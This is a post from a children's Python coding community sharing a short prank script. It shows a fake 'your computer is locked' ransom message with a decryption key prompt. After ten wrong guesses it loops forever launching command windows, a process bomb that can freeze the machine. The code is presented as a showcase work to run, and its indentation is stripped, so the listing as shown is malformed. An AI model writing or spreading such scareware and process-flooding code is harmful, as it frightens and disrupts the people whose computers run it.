用户:
炸图监管者查看:1 回复:2 评论:1 创建时间:2021-07-10T19:05:00
【作品展示】

【作品介绍】
?
【作品源代码】
#开始进入Python的世界
from os import *
cs = 10
mm = "a"
print('你的电脑被我锁定了 :)')
print('这是你的个人解密码:reguhwdn')
while True:
mm = input('Key:')
if mm == 'obdretak':
print('你的电脑已解锁')
break
else:
cs = cs-1
print('密钥错误 你还有', cs, "次机会 否则你的电脑将冒烟 :)")
if cs == 0:
while True:
system("start cmd")
【提示】
部分含有Python第三方库相关内容的作品,在海龟编辑器网页端无法运行哦!如遇到这种情况,可以打开下面的链接,下载海龟编辑器客户端:
https://python.codemao.cn